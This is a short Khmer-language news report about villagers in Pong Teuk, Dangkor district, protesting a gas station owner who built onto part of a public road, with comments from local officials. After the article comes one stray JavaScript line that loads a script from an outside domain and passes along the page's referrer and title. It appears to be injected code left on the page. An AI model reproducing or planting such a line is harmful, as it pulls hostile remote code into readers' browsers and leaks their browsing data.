ប្រជាពលរដ្ឋក្នុងភូមិពងទឹកកើតទុកមិនសុខចិត្តចំពោះម្ចាស់ហ្គារាស់សាំង ដែលបានសង់ហ្គារាសសាំងរំលោភយកដីផ្លូវដែលជាសម្បត្តិសាធារណៈ
ភ្នំពេញ៖ ប្រជាពលរដ្ឋក្នុងភូមិពងទឹកជាង ៥០ នាក់កើតទុក្ខមិនសុខចិត្តចំពោះម្ចាស់ហ្គារាស់សាំង ដែលបានសង់ហ្គារាស់សាំងរំលោភយកដីផ្លូវដែលជាសម្បត្តិសាធារណៈ។ ហេតុកាណ៍នេះកើតឡើងកាលពីវេលាម៉ោង ១០ ព្រឹកថ្ងៃទី៨ ខែ វិច្ឆិកា ឆ្នាំ ២០១៦ ស្ថិតនៅក្នុងភូមិពងទឹក សង្កាត់ពងទឹក ខណ្ឌដង្កោ។ ម្ចាស់ហ្គារាស់សាំងដែលបានសាងសង់ហ្គារាស់សាំងរំលោភយកដីផ្លូវជាសម្បត្តិផ្ទាល់ខ្លួនមានឈ្មោះ សឹម ចាន់ណា។
បើតាមការរៀបរាប់ពីលោក ហាយ សាម៉ន ដែលជាមេភូមិបានអោយដឹងថា ប្រជាពលរដ្ឋរស់នៅក្នុងភូមិមានចំនួន៣២៨គ្រួសារ ហើយផ្លូវដែលប្រជាពលរដ្ឋមកតវ៉ានោះមានប្រវែងជាង ២០០ ម៉ែត្រ នឹង ទទឹង ៤ ម៉ែត្រ។ លោកបានបន្ដទៀតថាផ្លូវមួយខ្សែនេះដែរមានគំរោងពង្រីកអោយគ្រប់ទទឹង៦ម៉ែត្រ នៅដើមឆ្នាំ២០១៧ខាងមុខនេះ។ តែទោះបីជាយ៉ាងណាម្ចាស់ហ្គាសរាស់សាំងឈ្មោះ សឹម ចាន់ណា នៅតែបន្ដធ្វើដោមមិនបានខ្វល់ខ្វាយពី ប្រជាពលរដ្ឋ ឬ អាជ្ញាធរណាឡើយ។ លោក ហាក់ គួយ ដែលជាចៅសង្កាត់បានប្រាប់អោយដឹងថា កន្លងលោកបានទទួលពាក្យបណ្ដឹងពីប្រជាពលរដ្ឋជាច្រើនលើកច្រើនសារមកហើយ ហើយលោកក៍បានចុះទៅណែនាំ នឹងបានបិទទីតាំងនោះ ចំនួន ២ ដងរួចមកហើយ លោកបានបន្ដទៀតថាចំពោះម្ចាស់ទីតាំងនោះបានរំលោភយកដីផ្លូវចំនួន ២ ម៉ែត្រ ។
ចំណែកម្ចាស់ទីតាំងបានប្រាប់អោយដឹងថាខ្លួនបានរត់ការណ៍អស់លុយច្រើនណាស់រហូតដល់សាលាខណ្ឌ តែមិនបានសុំការអនុញ្ញាត្តិពីសាលាសង្កាត់នោះទេ។ យ៉ាងណាមិញលោក ម៉ុក ពុទ្ធា នាយករដ្ឋបាលខណ្ឌដង្កោលោកមិនបានទទួលពីពត៌មាននេះទេ តែលោកបានប្រាប់វិញថាលោកនឹងអោយមន្ដ្រីសាលាខណ្ឌចុះទៅត្រួតពិនិត្យទៅលើបញ្ហានេះ។ ដោយ អាត ចន្ធូ
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;